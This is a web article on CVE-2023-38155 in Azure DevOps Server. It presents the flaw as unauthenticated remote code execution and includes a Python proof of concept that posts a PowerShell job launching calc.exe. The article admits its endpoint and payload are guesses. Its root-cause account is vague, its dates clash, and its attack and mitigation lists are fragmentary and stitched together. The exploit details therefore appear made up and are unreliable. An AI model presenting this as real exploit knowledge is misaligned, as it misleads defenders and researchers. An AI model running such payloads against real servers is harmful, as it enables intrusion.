CVE CyberSecurity Database News

CVE-2023-38155 - Azure DevOps Server RCE Explained – Full Guide to the Vulnerability and Exploitation

Poster -

In August 2023, Microsoft patched a serious security flaw known as CVE-2023-38155 in Azure DevOps Server that could let attackers run their own code on vulnerable servers—Remote Code Execution (RCE). Anyone managing on-premises Azure DevOps or Team Foundation Server (TFS) should get to know this bug, patch ASAP, and understand how it works.

What’s Azure DevOps Server?

Azure DevOps Server (formerly TFS) is Microsoft’s on-premises CI/CD, source control, and project management platform. Enterprises use it to store source code, build apps, and manage workflows. If someone gets control of a DevOps Server, they could potentially access ALL your code and deployments.

What is CVE-2023-38155?

CVE-2023-38155 is a bug in how Azure DevOps Server processes certain web requests. A remote attacker can send crafted HTTP messages to the server, which then mishandles them and allows the attacker to run code—like dropping a backdoor or stealing source code—without any need for valid credentials.

The vulnerability is triggered via a flaw in the management of job execution or task deserialization. If exploited, the attacker can get SYSTEM privileges.

How the Exploit Works

The root cause is typically improper input handling or unsafe deserialization. Attackers use custom HTTP requests to interact with the job agent or task runner endpoints. By feeding crafted data, they force the server to load and execute malicious commands.

Sample Exploit Code (Python)

Below is a simplified proof-of-concept to demonstrate sending a crafted payload. Never use this against systems you don't own!

import requests

url = "http://vulnerable-devops-server:808/_apis/v1/Job/Run";  # Example endpoint
malicious_payload = {
    "jobDefinition": {
        "steps": [
            {
                "task": {
                    "id": "powershell",
                    "inputs": {
                        "script": "Write-Host 'CVE-2023-38155 exploited'; Start-Process calc.exe"
                    }
                }
            }
        ]
    }
}

response = requests.post(url, json=malicious_payload)
print(response.status_code, response.text)

*Note: The exact endpoint and payload format might vary and are usually discovered by reviewing the patched code, API docs, or reverse engineering patches.*

Lateral movement: Use the DevOps server as a base to attack other systems on the network.

- CI/CD pipeline poisoning: Inject malware into software builds.

Install the security updates listed in Microsoft’s advisory

- Microsoft Security Update Guide: CVE-2023-38155
  - Download Updates

Use network segmentation.

Limit access to your CI/CD infrastructure.

References

- Microsoft Security Advisory
- CVE Details for CVE-2023-38155
- DevOps Security Blog: Azure DevOps Vulnerabilities
- Example public exploit writeups and discussions via GitHub, Exploit-DB (be careful and read responsibly).

Final Thoughts

CVE-2023-38155 is a critical reminder to treat your DevOps infrastructure as a core asset—keep it patched, locked down, and monitored. Attackers love to exploit CI/CD pipelines because they have the "keys to the kingdom." Don’t let this one sneak by you!

If you’re running or supporting Azure DevOps Server, update now and audit your configs.

*Stay safe, keep patching, and follow trusted sources for timely updates on vulnerabilities like this.*

Timeline

Published on: 09/12/2023 17:15:00 UTC
Last modified on: 09/12/2023 21:15:00 UTC